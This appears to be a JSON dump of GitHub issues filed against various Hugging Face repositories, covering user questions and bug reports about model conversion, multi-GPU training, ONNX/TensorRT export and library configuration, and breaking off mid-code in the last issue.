    "body": "### Describe the bug\n\nPublic spaces may stuck in Building after restarting, error log as follows:\n\nbuild error\nUnexpected job error\n\nERROR: failed to push spaces-registry.huggingface.tech/spaces/*:cpu-*-*: unexpected status from HEAD request to https://spaces-registry.huggingface.tech/v2/spaces/*/manifests/cpu-*-*: 401 Unauthorized\n\n### Steps to reproduce the bug\n\nRestart space / Factory rebuild cannot avoid it\n\n### Expected behavior\n\nFix this problem\n\n### Environment info\n\nno requirements.txt can still happen\npython gradio spaces",
    "url": "https://github.com/huggingface/datasets/issues/7530",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-21T03:08:38Z",
    "updated_at": "2025-11-11T00:57:14Z",
    "user": "ghost"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1005,
    "title": "[pi0] n_action_step vs chunk_size",
    "body": "In modeling_pi0.py, the config variable `chunk_size` is never used. Instead, the action queue is set to be the size of `n_action_step`, and the training loss is also calculated on the actions of size `n_action_step`. \n\nBut I thought what should happen is that the model would predict actions of length `chunk size` (and the loss is calculated on this action length as well), and the actual execution only takes `n_action_step`. At the very least, the variable that defines the size of `action_queue` should not be the same as the variable that defines the size of the predicted action vector. They may take the same value, but should be different variables, so the user can use the config to adjust how often they want to do inference\n\nThis is also what happens in pi0fast's implementation, if I am not mistaken\n \nAm I missing something here? Thanks in advance",
    "url": "https://github.com/huggingface/lerobot/issues/1005",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-20T04:00:23Z",
    "updated_at": "2025-11-07T02:30:27Z",
    "user": "IrvingF7"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1000,
    "title": "How to implement a new policy?",
    "body": "How can I integrate a new policy (e.g., OpenVLA) into LeRobot, and specifically, which files do I need to modify?",
    "url": "https://github.com/huggingface/lerobot/issues/1000",
    "state": "closed",
    "labels": [
      "enhancement",
      "policies"
    ],
    "created_at": "2025-04-19T08:53:48Z",
    "updated_at": "2025-07-29T14:30:18Z",
    "user": "Elycyx"
  },
  {
    "repo": "huggingface/prettier-plugin-vertical-align",
    "number": 2,
    "title": "how to use",
    "body": "https://github.com/huggingface/prettier-plugin-vertical-align#installation\n\nAdd plugins: [\"@huggingface/prettier-plugin-vertical-align\"] to your .prettierrc file.\n\nAre you sure to .prettierrc file?",
    "url": "https://github.com/huggingface/prettier-plugin-vertical-align/issues/2",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-19T04:15:29Z",
    "updated_at": "2025-04-24T02:53:42Z",
    "user": "twotwoba"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 997,
    "title": "how to convert pi0 fast",
    "body": "i just meet pi0 convert, how to convert pi0 fast\n![Image](https://github.com/user-attachments/assets/ca6b8c52-4000-478e-88a0-501f0ce3c205)\n",
    "url": "https://github.com/huggingface/lerobot/issues/997",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-18T14:27:29Z",
    "updated_at": "2025-10-14T14:06:30Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11359,
    "title": "[Feature request] LTX-Video v0.9.6 15x faster inference than non-distilled model.",
    "body": "**Is your feature request related to a problem? Please describe.**\nNo problem. This request is Low priority. As and when time allows.\n\n**Describe the solution you'd like.**\nPlease support the new release of LTX-Video 0.9.6\n\n**Describe alternatives you've considered.**\nOriginal repo have support but it is easier to use with diffusers\n\n**Additional context.**\nApril, 15th, 2025: New checkpoints v0.9.6:\nRelease a new checkpoint [ltxv-2b-0.9.6-dev-04-25](https://huggingface.co/Lightricks/LTX-Video/blob/main/ltxv-2b-0.9.6-dev-04-25.safetensors) with improved quality\nRelease a new distilled model [ltxv-2b-0.9.6-distilled-04-25](https://huggingface.co/Lightricks/LTX-Video/blob/main/ltxv-2b-0.9.6-distilled-04-25.safetensors)\n15x faster inference than non-distilled model.\nDoes not require classifier-free guidance and spatio-temporal guidance.\nSupports sampling with 8 (recommended), 4, 2 or 1 diffusion steps.\nImproved prompt adherence, motion quality and fine details.\nNew default resolution and FPS: 1216 \u00d7 704 pixels at 30 FPS\nStill real time on H100 with the distilled model.\nOther resolutions and FPS are still supported.\nSupport stochastic inference (can improve visual quality when using the distilled model)\nhttps://github.com/Lightricks/LTX-Video\n\nFeedback on distilled model\nhttps://www.reddit.com/r/StableDiffusion/comments/1k1xk1m/6_seconds_video_in_60_seconds_in_this_quality_is/\n\nhttps://www.reddit.com/r/StableDiffusion/comments/1k1o4x8/the_new_ltxvideo_096_distilled_model_is_actually/",
    "url": "https://github.com/huggingface/diffusers/issues/11359",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-18T08:05:27Z",
    "updated_at": "2025-05-09T16:03:34Z",
    "comments": 6,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1291,
    "title": "@xenova/transformers vs. @huggingface/transformers npm package",
    "body": "### Question\n\nIt's pretty confusing to have both of these on npm. Which are we supposed to use?\n\nCan you please deprecate the one that we aren't supposed to use? (`npm deprecate`)",
    "url": "https://github.com/huggingface/transformers.js/issues/1291",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-17T16:10:36Z",
    "updated_at": "2025-10-24T10:19:03Z",
    "user": "nzakas"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3510,
    "title": "Accelerate Config Error - How to debug this?",
    "body": "### System Info\n\n```Shell\npip list\n\nabsl-py                  2.2.2\naccelerate               1.6.0\nannotated-types          0.7.0\nbitsandbytes             0.45.5\ndiffusers                0.33.0.dev0 /data/roy/diffusers\nftfy                     6.3.1\nhuggingface-hub          0.30.2\nnumpy                    2.2.4\nnvidia-cublas-cu12       12.4.5.8\nnvidia-cuda-cupti-cu12   12.4.127\nnvidia-cuda-nvrtc-cu12   12.4.127\nnvidia-cuda-runtime-cu12 12.4.127\nnvidia-cudnn-cu12        9.1.0.70\nnvidia-cufft-cu12        11.2.1.3\nnvidia-curand-cu12       10.3.5.147\nnvidia-cusolver-cu12     11.6.1.9\nnvidia-cusparse-cu12     12.3.1.170\nnvidia-cusparselt-cu12   0.6.2\nnvidia-nccl-cu12         2.21.5\nnvidia-nvjitlink-cu12    12.4.127\nnvidia-nvtx-cu12         12.4.127\npackaging                24.2\npeft                     0.15.2\npip                      22.0.2\nprotobuf                 5.29.4\nsafetensors              0.5.3\nsetuptools               59.6.0\ntokenizers               0.21.1\ntorch                    2.6.0\ntorchvision              0.21.0\ntransformers             4.51.3\ntriton                   3.2.0\nwandb                    0.19.9\n... etc\n\n\nnvidia-smi\n\n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 570.124.06             Driver Version: 570.124.06     CUDA Version: 12.8     |\n|-----------------------------------------+------------------------+----------------------+\n| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |\n| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |\n|                                         |                        |               MIG M. |\n|=========================================+========================+======================|\n|   0  NVIDIA H100 PCIe               Off |   00000000:2E:00.0 Off |                    0 |\n| N/A   43C    P0             84W /  350W |   16460MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   1  NVIDIA H100 PCIe               Off |   00000000:30:00.0 Off |                    0 |\n| N/A   45C    P0             89W /  350W |   11456MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   2  NVIDIA H100 PCIe               Off |   00000000:3F:00.0 Off |                    0 |\n| N/A   40C    P0             86W /  350W |   11384MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   3  NVIDIA H100 PCIe               Off |   00000000:41:00.0 Off |                    0 |\n| N/A   36C    P0             47W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   4  NVIDIA H100 PCIe               Off |   00000000:B0:00.0 Off |                    0 |\n| N/A   46C    P0             87W /  350W |   11384MiB /  81559MiB |    100%      Default |\n|                   
                      |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   5  NVIDIA H100 PCIe               Off |   00000000:B1:00.0 Off |                    0 |\n| N/A   39C    P0             48W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   6  NVIDIA H100 PCIe               Off |   00000000:C1:00.0 Off |                    0 |\n| N/A   35C    P0             52W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   7  NVIDIA H100 PCIe               Off |   00000000:C2:00.0 Off |                    0 |\n| N/A   35C    P0             51W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n                                                                                         \n+-----------------------------------------------------------------------------------------+\n| Processes:                                                                ",
    "url": "https://github.com/huggingface/accelerate/issues/3510",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-17T11:12:50Z",
    "updated_at": "2025-05-19T08:46:12Z",
    "user": "KihongK"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11351,
    "title": "Why Wan i2v video processor always float32 datatype?",
    "body": "### Describe the bug\n\nI found   \n\nimage = self.video_processor.preprocess(image, height=height, width=width).to(device, dtype=torch.float32)\n\nhttps://github.com/huggingface/diffusers/blob/29d2afbfe2e09a4ee7cc51455e51ce8b8c0e252d/src/diffusers/pipelines/wan/pipeline_wan_i2v.py#L633\n\nin pipeline_wan_i2v.py\n\nwhy datatype always float32, maybe it's a bug\n\n### Reproduction\n\njust run \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nany platform\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11351",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-17T07:00:42Z",
    "updated_at": "2025-05-07T03:48:24Z",
    "comments": 2,
    "user": "DamonsJ"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37570,
    "title": "How to streaming output audio of Qwen2.5-omni-7b",
    "body": "All the examples of qwen2.5-omni-7b did not show how to streaming output audio, with passing streamer, I am able to get streaming text, but how can I get the streaming audio output?",
    "url": "https://github.com/huggingface/transformers/issues/37570",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-17T04:16:35Z",
    "updated_at": "2025-07-30T08:03:44Z",
    "user": "qinxuye"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11339,
    "title": "How to multi-GPU WAN inference",
    "body": "Hi,I didn't find multi-gpu inferences  example in the documentation. Can you give me an example, such as Wan2.1-I2V-14B-720P-Diffusers.\nI would appreciate some help on that, thank you in advance",
    "url": "https://github.com/huggingface/diffusers/issues/11339",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-16T10:22:41Z",
    "updated_at": "2025-07-05T21:18:01Z",
    "user": "HeathHose"
  },
  {
    "repo": "huggingface/trl",
    "number": 3295,
    "title": "i have 2 gpu\uff0cbut default gpu:0,How to specify a gpu:1 for training?",
    "body": "### Reproduction\n\n```python\nfrom trl import ...\n\n```\n\noutputs:\n\n```\nTraceback (most recent call last):\n  File \"example.py\", line 42, in \n    ...\n```\n\n\n### System Info\n\ni have 2 gpu\uff0cbut default gpu:0,How to specify a gpu:1 for training?\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/3295",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83d\udcf1 cli"
    ],
    "created_at": "2025-04-15T08:29:26Z",
    "updated_at": "2025-04-24T19:46:37Z",
    "user": "Aristomd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 981,
    "title": "How can I simulate robots without physical robots? How should I learn simulation robots? Do you have any good recommendations?",
    "body": "How can I simulate robots without physical robots? How should I learn simulation robots? Do you have any good recommendations?I am a beginner.",
    "url": "https://github.com/huggingface/lerobot/issues/981",
    "state": "closed",
    "labels": [
      "question",
      "simulation"
    ],
    "created_at": "2025-04-15T04:04:33Z",
    "updated_at": "2025-10-17T11:19:34Z",
    "user": "harryhu0301"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11321,
    "title": "flux controlnet train  ReadMe have a bug",
    "body": "### Describe the bug\n\n![Image](https://github.com/user-attachments/assets/bc20df10-80b0-46fa-b013-799a3b1865b4)\n\nwhat is the controlnet config parameters?  text is num_single_layers = 10, but the code set num_single_layers=0?\n\n### Reproduction\n\ncheck readme file\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\ndiffusers ==0.33.0\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11321",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-15T01:30:58Z",
    "updated_at": "2025-10-11T09:58:52Z",
    "comments": 14,
    "user": "Johnson-yue"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 428,
    "title": "[QUESTION] Current schedule is non-sensical",
    "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nThe course page states:\n\n> There\u2019s a deadline for the certification process: all the assignments must be finished before May 1st 2025.\n\nBut the \"when will the next units be published\" graph doesn't have Unit 4 even being released until \"The end of April\". And as of today (April 14, 2025) we still have no idea what any of the \"use case assignments\" are. As it stands, it appears to be impossible to actually complete this course.\n\n\nAnd no one from Hugging Face seems to be answering, or even acknowledging, any questions on this topic. It would be nice to get some clarity / updates.\n",
    "url": "https://github.com/huggingface/agents-course/issues/428",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-14T18:13:31Z",
    "updated_at": "2025-04-28T06:51:58Z",
    "user": "mindcrime"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 975,
    "title": "[Question] How to modify model & dataset to accept two input images in observation.image?",
    "body": "Hi, thank you for the great repo!\n\nI\u2019ve been going through the first three examples, and now I\u2019d like to explore training a diffusion policy with some customized input. Specifically:\n\nMy goal:\nI want each observation.image to contain two images as input (they have the same shape as the original single image).\n\nI want the output of the model to remain the same as in the original diffusion policy.\n\nMy question:\nSince I\u2019m new to this repo, I\u2019d like to ask for guidance on what needs to be modified to support this:\n\nModel architecture: which parts of the model code should I look at or modify to handle a double-image input?\n\nDataset / Data loading: where should I modify the dataset to provide observation.image with two images instead of one?\n\nAre there any other components I should be aware of (e.g., pre-processing, normalization, config changes, etc.)?\n\nAny advice or pointers to relevant parts of the code would be greatly appreciated!\n\nThanks in advance \ud83d\ude4f",
    "url": "https://github.com/huggingface/lerobot/issues/975",
    "state": "closed",
    "labels": [
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-14T08:35:47Z",
    "updated_at": "2025-11-04T02:30:23Z",
    "user": "Keith-Luo"
  },
  {
    "repo": "huggingface/candle",
    "number": 2893,
    "title": "How to build a multi-node inference/training in candle?",
    "body": "Hi team,\n\nI'd like to have an example on mulit-node inference/training of candle, how can I find it?\n\nThanks :)\n\n-- Klaus",
    "url": "https://github.com/huggingface/candle/issues/2893",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-14T08:03:20Z",
    "updated_at": "2025-04-14T08:03:20Z",
    "user": "k82cn"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1795,
    "title": "Offline Custom Tools",
    "body": "Would it be possible to define/use tools that the LLMs can use in an offline state?\n\n\"Tools must use Hugging Face Gradio Spaces as we detect the input and output types automatically from the [Gradio API](https://www.gradio.app/guides/sharing-your-app#api-page).\"\n\n\nIs there any reason that the tools can't be hosted locally with the same ability for the LLM to use?",
    "url": "https://github.com/huggingface/chat-ui/issues/1795",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-14T02:41:19Z",
    "updated_at": "2025-04-14T02:41:19Z",
    "comments": 0,
    "user": "cr-intezra"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1794,
    "title": "Docker Image and Local Install missing file/image/etc upload",
    "body": "I've used the chat-ui-db:latest image as well as cloning the repo, setting up mongo and npm install/run dev and the UI I get does not have the icons or ability to upload in image or file. It only has the web search button.\n\nThis would be for release 0.9.4.\n\nIs there something in .env.local that I am missing to enable this feature?\n\nOtherwise the chat-ui works as intended, I am able to use different models but wanted to test the ability to use a vision model.\n\n![Image](https://github.com/user-attachments/assets/92c3117b-0f8e-467f-91e7-7ca4f7b95539)",
    "url": "https://github.com/huggingface/chat-ui/issues/1794",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-13T19:30:29Z",
    "updated_at": "2025-04-13T19:30:29Z",
    "comments": 0,
    "user": "cr-intezra"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2228,
    "title": "Unable to convert an audio-to-audio model.",
    "body": "### Feature request\n\n``` bash\noptimum-cli export onnx --model microsoft/speecht5_vc speecht5_vc_onnx/\n```\n\nOutput:\n\n``` log\nThe cache for model files in Transformers v4.22.0 has been updated. Migrating your old cache. This is a one-time only operation. You can interrupt this and resume the migration later on by calling `transformers.utils.move_cache()`.\n0it [00:00, ?it/s]\nTraceback (most recent call last):\n  File \"/usr/local/bin/optimum-cli\", line 8, in \n    sys.exit(main())\n             ^^^^^^\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/commands/optimum_cli.py\", line 208, in main\n    service.run()\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\n    main_export(\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/exporters/onnx/__main__.py\", line 296, in main_export\n    raise ValueError(\nValueError: Asked to export a speecht5 model for the task audio-to-audio (auto-detected), but the Optimum ONNX exporter only supports the tasks text-to-audio for speecht5. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task audio-to-audio to be supported in the ONNX export for speecht5.\n```\n\n### Motivation\n\nMy primary objective is to convert Hugging Face models to TensorRT, but according to the documentation I've reviewed, ONNX must be used as an intermediate step\n\n### Your contribution\n\nI don't believe I have the technical capability to implement this feature.",
    "url": "https://github.com/huggingface/optimum/issues/2228",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2025-04-13T00:50:26Z",
    "updated_at": "2025-05-18T02:17:06Z",
    "comments": 1,
    "user": "divinerapier"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 971,
    "title": "Can different robotic arms share the same dataset and model?",
    "body": "English\uff1a\nI currently have datasets and models for the Koch, SO100, and ALOHA robotic arms. Is it possible for these three arms to share the same dataset and model? If so, how should this be implemented? If not\u2014given the significant hardware differences\u2014what is the practical value of data sharing in this context?\n@Cadene \n\n\u4e2d\u6587\uff1a\n\u6211\u8fd9\u91cc\u6709koch\u3001so100\u3001alhoa\u7684\u6570\u636e\u96c6\u548c\u6a21\u578b\uff0c\u4e09\u6b3e\u673a\u68b0\u81c2\u80fd\u5171\u7528\u6570\u636e\u96c6\u5408\u6a21\u578b\u4e48\uff1f\u5982\u679c\u80fd\uff0c\u600e\u4e48\u7528\uff1f\u5982\u679c\u4e0d\u80fd\uff0c\u90a3\u786c\u4ef6\u5343\u5dee\u4e07\u522b\uff0c\u6570\u636e\u5171\u4eab\u7684\u610f\u4e49\u4f55\u5728\uff1f\n",
    "url": "https://github.com/huggingface/lerobot/issues/971",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-12T05:03:27Z",
    "updated_at": "2025-10-17T12:06:45Z",
    "user": "ZhangWuWei"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 881,
    "title": "Accelerators: Error fetching data. how to troubleshoot",
    "body": "\nGetting this error message when trying to train my model using Autotrain\n\n\nAccelerators: Error fetching data\nError fetching training status\n\n\nMy data file is a csv & correctly formatted. \nWhat are possible ways to troubleshoot this problem?\nI'm new to fine-tuning so would love any assistance ",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/881",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-11T16:04:12Z",
    "updated_at": "2025-06-02T15:02:09Z",
    "user": "innerspacestudio"
  },
  {
    "repo": "huggingface/alignment-handbook",
    "number": 215,
    "title": "Use alignment-handbook on Apple Silicon",
    "body": "Hi, is it possible to install and use this tool on Apple Silicon? I am aware that certain dependencies, such as Flash Attention, do not work on Apple Silicon. Has anyone tried and successfully installed this tool without those dependencies?",
    "url": "https://github.com/huggingface/alignment-handbook/issues/215",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-11T01:28:02Z",
    "updated_at": "2025-04-27T01:09:55Z",
    "comments": 0,
    "user": "minhquoc0712"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 968,
    "title": "\u6ca1\u6709\u7269\u7406\u673a\u5668\u4eba\u6211\u5982\u4f55\u8fdb\u884c\u4eff\u771f\u673a\u5668\u4eba\uff0c\u6211\u5e94\u8be5\u5982\u4f55\u5b66\u4e60",
    "body": "\u6ca1\u6709\u7269\u7406\u673a\u5668\u4eba\u6211\u5982\u4f55\u8fdb\u884c\u4eff\u771f\u673a\u5668\u4eba\uff0c\u6211\u5e94\u8be5\u5982\u4f55\u5b66\u4e60\u4eff\u771f\u673a\u5668\u4eba\u5462\uff0c\u6709\u6ca1\u6709\u597d\u7684\u63a8\u8350\u5417",
    "url": "https://github.com/huggingface/lerobot/issues/968",
    "state": "closed",
    "labels": [
      "question",
      "simulation"
    ],
    "created_at": "2025-04-10T18:10:47Z",
    "updated_at": "2025-10-08T12:54:19Z",
    "user": "harryhu0301"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11285,
    "title": "value errors in convert to/from diffusers from original stable diffusion",
    "body": "### Describe the bug\n\nThere's a hardcode somewhere for 77 tokens, when it should be using the dimensions of what is actually in the model.\n\nI have a diffusers-layout SD1.5 model, with LongCLIP.\n\nhttps://huggingface.co/opendiffusionai/xllsd-alpha0\n\nI can pull it locally, then convert to single file format, with\n\npython convert_diffusers_to_original_stable_diffusion.py \\\n  --use_safetensors \\\n  --model_path $SRCM \\\n  --checkpoint_path $DESTM\n\nBut then if I try to convert it back, I get size errors for the text encoder not being 77 size.\n\n\nI should point out that the model WORKS PROPERLY for diffusion, when loaded in diffusers format, so I dont have some funky broken model here.\n\n\n\n### Reproduction\n\nfrom transformers import CLIPTextModel, CLIPTokenizer\n\nfrom diffusers import StableDiffusionPipeline, AutoencoderKL\nimport torch\n\n\npipe = StableDiffusionPipeline.from_single_file(\n        \"XLLsd-phase0.safetensors\",\n        torch_dtype=torch.float32,\n        use_safetensors=True)\n\n\noutname = \"XLLsd_recreate\"\npipe.save_pretrained(outname, safe_serialization=False)\n\n### Logs\n\n```shell\nvenv/lib/python3.12/site-packages/diffusers/models/model_loading_utils.py\", line 230, in load_model_dict_into_meta\n    raise ValueError(\nValueError: Cannot load  because text_model.embeddings.position_embedding.weight expected shape torch.Size([77, 768]), but got torch.Size([248, 768]). If you want to instead overwrite randomly initialized weights, please make sure to pass both `low_cpu_mem_usage=False` and `ignore_mismatched_sizes=True`. For more information, see also: https://github.com/huggingface/diffusers/issues/1619#issuecomment-1345604389 as an example.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.2\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.12.3\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.29.3\n- Transformers version: 4.50.0\n- Accelerate version: 1.5.2\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11285",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-10T17:16:42Z",
    "updated_at": "2025-05-12T15:03:03Z",
    "comments": 2,
    "user": "ppbrown"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11272,
    "title": "what is the difference between from diffusion import *** and from diffusers import ***?",
    "body": "I have installed diffusers and it runs ok, however the code gets wrong with \" no module named diffusion \"\nwhen goes to from diffusion import ***?\nWhat is the difference between from diffusion import *** and from diffusers import ***?\nNeed I install them all and what is the difference between diffusion and diffusers?",
    "url": "https://github.com/huggingface/diffusers/issues/11272",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T05:11:56Z",
    "updated_at": "2025-04-30T02:11:51Z",
    "user": "micklexqg"
  },
  {
    "repo": "huggingface/inference-benchmarker",
    "number": 11,
    "title": "How to set the OPENAI_API_KEY?",
    "body": "There is no api_key param for inference-benchmarker. How to set the OPENAI_API_KEY?\nThanks~\n\ncode there:\nhttps://github.com/huggingface/inference-benchmarker/blob/d91a0162bdfe318fe95b9a9bbb53b1bdc39194a9/src/requests.rs#L145C1-L153C36\n\n```bash\nroot@P8757303A244:/opt/inference-benchmarker# inference-benchmarker -h\nUsage: inference-benchmarker [OPTIONS] --tokenizer-name \n\nOptions:\n  -t, --tokenizer-name \n          The name of the tokenizer to use [env: TOKENIZER_NAME=]\n      --model-name \n          The name of the model to use. If not provided, the same name as the tokenizer will be used [env: MODEL_NAME=]\n  -m, --max-vus \n          The maximum number of virtual users to use [env: MAX_VUS=] [default: 128]\n  -d, --duration \n          The duration of each benchmark step [env: DURATION=] [default: 120s]\n  -r, --rates \n          A list of rates of requests to send per second (only valid for the ConstantArrivalRate benchmark) [env: RATES=]\n      --num-rates \n          The number of rates to sweep through (only valid for the \"sweep\" benchmark) The rates will be linearly spaced up to the detected maximum rate [env: NUM_RATES=] [default: 10]\n      --profile \n          A benchmark profile to use [env: PROFILE=]\n  -b, --benchmark-kind \n          The kind of benchmark to run (throughput, sweep, optimum) [env: BENCHMARK_KIND=] [default: sweep]\n  -w, --warmup \n          The duration of the prewarm step ran before the benchmark to warm up the backend (JIT, caches, etc.) [env: WARMUP=] [default: 30s]\n  -u, --url \n          The URL of the backend to benchmark. Must be compatible with OpenAI Message API [env: URL=] [default: http://localhost:8000]\n  -n, --no-console\n          Disable console UI [env: NO_CONSOLE=]\n      --prompt-options \n          Constraints for prompt length. No value means use the input prompt as defined in input dataset. We sample the number of tokens to generate from a normal distribution. Specified as a comma-separated list of key=value pairs. * num_tokens: target number of prompt tokens * min_tokens: minimum number of prompt tokens * max_tokens: maximum number of prompt tokens * variance: variance in the number of prompt tokens [env: PROMPT_OPTIONS=]\n      --decode-options \n          Constraints for the generated text. We sample the number of tokens to generate from a normal distribution. Specified as a comma-separated list of key=value pairs. * num_tokens: target number of generated tokens * min_tokens: minimum number of generated tokens * max_tokens: maximum number of generated tokens * variance: variance in the number of generated tokens [env: DECODE_OPTIONS=]\n      --dataset \n          Hugging Face dataset to use for prompt generation [env: DATASET=] [default: hlarcher/inference-benchmarker]\n      --dataset-file \n          File to use in the Dataset [env: DATASET_FILE=] [default: share_gpt_filtered_small.json]\n      --extra-meta \n          Extra metadata to include in the benchmark results file, comma-separated key-value pairs. It can be, for example, used to include information about the configuration of the benched server. Example: --extra-meta \"key1=value1,key2=value2\" [env: EXTRA_META=]\n      --run-id \n          [env: RUN_ID=]\n  -h, --help\n          Print help (see more with '--help')\n  -V, --version\n          Print version\n```",
    "url": "https://github.com/huggingface/inference-benchmarker/issues/11",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T04:36:11Z",
    "updated_at": "2025-04-25T13:13:18Z",
    "user": "handsome-chips"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37408,
    "title": "How to solve the error of converting Qwen onnx_model to tensorRT_model?",
    "body": "### **1. The transformers' Qwen ONNX model has been exported successfully.**\n\n### **2. Convert ONNX_model to tensorRT_model failed by trtexec.**\n\n**error info**\n\n```\n[04/10/2025-11:04:52] [E] Error[3]: IExecutionContext::setInputShape: Error Code 3: API Usage Error (Parameter check failed, condition: engineDims.d[i] == dims.d[i]. Static dimension mismatch while setting input shape for key_cache.1. Set dimensions are [7,8,32,128]. Expected dimensions are [7,8,1,128].)\n[04/10/2025-11:04:52] [E] The engine was built with static shapes for input tensor key_cache.1 but the provided shapes do not match the static shapes!\n[04/10/2025-11:04:52] [E] Inference set up failed\n```\n\n### **Due to the fact that Qwen of Transoformers utilizes the DynamicCache class to handle KVcache, The error should be attributed to DynamicCache.**\n\n**### ONNX model check OK**\n\n```\nThe model is well-formed and valid!\n=======================Model1 inputs:\nx_s [1, 'seq_len', 1024]\nattn_mask [1, 'seq_len', 'seq_len']\nkey_cache.1 [7, 8, 'seq_len', 128]\nvalue_cache.1 [7, 8, 'seq_len', 128]\n=======================Model1 outputs:\ny_pred [1, 'seq_len', 1024]\nkey_cache [7, 8, 'seq_len', 128]\nvalue_cache [7, 8, 'seq_len', 128]\n```\n\n**export foward**\n\n```\ndef injected_forward(\n    self, \n    xs: torch.Tensor,\n    att_mask: torch.Tensor = torch.ones((0, 0, 0), dtype=torch.bool),\n    key_cache: torch.Tensor = torch.zeros((0, 0, 0, 0), dtype=torch.float32),\n    value_cache: torch.Tensor = torch.zeros((0, 0, 0, 0), dtype=torch.float32)\n) -> 